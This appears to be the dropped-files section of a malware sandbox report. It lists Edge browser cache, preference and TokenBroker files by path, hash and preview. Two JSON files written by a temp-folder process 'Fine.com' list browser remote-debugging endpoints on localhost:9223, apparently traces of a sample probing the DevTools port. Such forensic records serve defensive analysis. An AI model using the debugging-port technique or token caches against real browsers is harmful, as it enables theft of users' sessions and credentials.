                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):29
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                                                          MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                                                          SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                                                          SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                                                          SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):575056
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                                                          MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                                                          SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                                                          SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                                                          SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_638004170464094982

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):460992
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                                                          SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                                                          MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                                                          SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                                                          SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                                                          SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):9
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                                                          MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                                                          SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                                                          SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                                                          SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:uriCache_

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):179
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.02016070034669
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclT7fcZBV:YWLSGTt1o9LuLgfGBPAzkVj/T8lEx
                                                                                                                                                                                                                                                                                                                          MD5:C848CAB8C301D589F74A1861899B09F0
                                                                                                                                                                                                                                                                                                                          SHA1:1541C98931E570874BCAA630EB67AFC0DBF5557F
                                                                                                                                                                                                                                                                                                                          SHA-256:D86754FA2E79FA1BAE483140CC2DA3944AEA67DD763F9474727DE3EB2943DC2A
                                                                                                                                                                                                                                                                                                                          SHA-512:7872F845C07A5A85984F6C44B1CCF84419C006A265D4B730D29B575173CFE524FE4EA2E796F3A54E46DE68DB7B7DBE832CA773E02045C2D7DE5E5D29AB29BFF9
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1736799788986661}]}

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):86
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
                                                                                                                                                                                                                                                                                                                          MD5:16B7586B9EBA5296EA04B791FC3D675E
                                                                                                                                                                                                                                                                                                                          SHA1:8890767DD7EB4D1BEAB829324BA8B9599051F0B0
                                                                                                                                                                                                                                                                                                                          SHA-256:474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
                                                                                                                                                                                                                                                                                                                          SHA-512:58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\d6a9db1f-9701-4eb9-99c3-374ff12f4eda.tmp

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):44693
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.0962889891417475
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xkBnwu8hDO6vP6OgNouxc9y95cGoup1Xl3jVzXr4CCz:z/Ps+wsI7yOEB6Ayutchu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                                          MD5:6F147728D567DED443AFB2CDA14E1D75
                                                                                                                                                                                                                                                                                                                          SHA1:DF6F49F02BC5416E6BA9E12D82F92F983857A76A
                                                                                                                                                                                                                                                                                                                          SHA-256:997D1C0E69C38018D06D26751519D8F8AE93CB523CBEE588DEF8AA1E9414C0BE
                                                                                                                                                                                                                                                                                                                          SHA-512:3F2B04F05BB8D2C20E3DD3B46077AF1EC941BD8ABBA8B22B1E3276CDAFE28065E9FBD6490E755556F1A383795524C515CE2FDC43AA53A9F890B6A090D3EF0548
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2278
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.8477984660141216
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:uiTrlKxrgxy7xl9Il8usxPsuFOXvlN2f3T13nBY0bwxd1rc:mPfYnuFOXn2PT1XlX
                                                                                                                                                                                                                                                                                                                          MD5:61AA6D4C7FE2E08CDBB8A3EEB844B97F
                                                                                                                                                                                                                                                                                                                          SHA1:600FA2CE81535F2563684320F064E4BDCD8B9237
                                                                                                                                                                                                                                                                                                                          SHA-256:AD02CFEB3F00B5A21B11B7F5E6F212D3078606DDE781EB8E1368A44A85D359FD
                                                                                                                                                                                                                                                                                                                          SHA-512:F526524FA30EBF86500BD272A8925CBF1BB2E68545E176E4AED966C4F94FBB3F46D4094AF751FD298AEF23AE44ECEBA83B5557E843B5C2B3C88145CF8C0D9ABF
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.G.a.g.p.R.Z.l.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.b.M.s.V.S.I.

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):4622
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.9949371718027233
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:uiTrlKxExf7xD9Il8usxPs/X2tLPWSJc/emijCdKgIwCNYkAHaLJyjeuNdfk5FVC:jJYnPahJbGIgHVkAmmkJIdl6LbyXzL
                                                                                                                                                                                                                                                                                                                          MD5:0328E871D07F92682911BA0B4573C3AA
                                                                                                                                                                                                                                                                                                                          SHA1:500DEB029A3B2CEC06494D8031EC9D6946B79F25
                                                                                                                                                                                                                                                                                                                          SHA-256:5F23545DAE8F2E6BF3343AB9D93B0BD475DD99FBCA53AB7B5EFD3CE87FE6251B
                                                                                                                                                                                                                                                                                                                          SHA-512:1C1082F6D91CDDEAF6D41AC798B0F9414EA404B69DC0829582F5C47FD27CA1BD2897E68768ECAAA0AC7D6FBE541577831C274B43FAAE1289694E397953CC2B38
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".d.b.m.c.i.w.5.l.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.b.M.s.V.S.I.

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2684
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.8931128583949346
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:uiTrlKx68Wa7xqSxl9Il8usxPs5oDXMxHXl5BopC5XPGRvXGZ4S+d/vc:a02Yn2MB15l5/UXGZ4u
                                                                                                                                                                                                                                                                                                                          MD5:971055D1D72D15EEDA385A6AC12A4A29
                                                                                                                                                                                                                                                                                                                          SHA1:E80B0CDF030B6CA4A039A8784B474DB21624AF2C
                                                                                                                                                                                                                                                                                                                          SHA-256:950B273A6C1F9FD5D2458B4946ADCD949EDFB9EA782D79612F59886319C2BD07
                                                                                                                                                                                                                                                                                                                          SHA-512:6D9D86756504C5524CF35B95EBD85915E04B25C263D89C38F7B0F5DDCA85E8DAEBB232543EC57F2588F2A280FB03454CEEC317AAD86921D75246C68A6A3EB7E5
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".N.z.U.R.v.N.+.D.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.b.M.s.V.S.I.

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\json[1].json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):3500
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.4002571894682125
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:96:6NnCuHCgNnCs4QbCszNnCI9CSNnCQG3dgECQRNnCTB2dCTBKNnCsDCPNnCgSGwCj:6NrNPNDNqvNi58N72NVINhlZi
                                                                                                                                                                                                                                                                                                                          MD5:D2BFEBB63F0EF2A89607E5D2DD5C478A
                                                                                                                                                                                                                                                                                                                          SHA1:4F9C94A69C0921E4463DBB021BC21B35A442D9CC
                                                                                                                                                                                                                                                                                                                          SHA-256:7B9BE4E1D9CF19DC3DD639A22028B65288562A051E06EF234DD8EF8E7099EE07
                                                                                                                                                                                                                                                                                                                          SHA-512:14C6B11044067A602F06325F4061C10B0A1434E17B50D12414D7712C1A4DFF618F2A560D3CD846EBB819B4242FDF754849F7F1D248CCD1C471F1C7782E486D9A
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/1EDB958EB74DBF8A0E42181D3ABB5EF7",.. "id": "1EDB958EB74DBF8A0E42181D3ABB5EF7",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/1EDB958EB74DBF8A0E42181D3ABB5EF7"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/A4F098C01FEBD94B6692410FFB89A7C7",.. "id": "A4F098C01FEBD94B6692410FFB89A7C7",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/A4F098C01FEBD94B6692410FFB89A7C7"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\json[1].json

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\424372\Fine.com
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1787
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.3738898198690705
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:SfNaoCOwPTEC3YfNaoCQC6wfNaoCpCpfNaoCz0UrU0U8Cw:6NnCOwPTEC3kNnCQCpNnCpCFNnCz0Url
                                                                                                                                                                                                                                                                                                                          MD5:3CEC15878AE3CA1DD0AE94C05151C162
                                                                                                                                                                                                                                                                                                                          SHA1:820C66947A0019A2CF07E782BAEC66B255EC2C58
                                                                                                                                                                                                                                                                                                                          SHA-256:63C621001C465B012C19DF6CECA311CDE61515A60C1EFEDF5952569810969D86
                                                                                                                                                                                                                                                                                                                          SHA-512:91472CC4E9913FAC504A1FBB26E1117CBB34AEF14171CF6EF8F9CB786659B4CDE2AB6BA6A8A5501745F359A1D7B63D699D96D3422E308E9F35AF7DEE5DAAF0F5
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/C7288A93911E70DDCA9676A1E1BF0D16",.. "id": "C7288A93911E70DDCA9676A1E1BF0D16",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/C7288A93911E70DDCA9676A1E1BF0D16"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/95A13B44DE41F8DD5700C991D758A27E",.. "id": "95A13B44DE41F8DD5700C991D758A27E",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/95A13B44DE41F8DD5700C991D758A27E"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

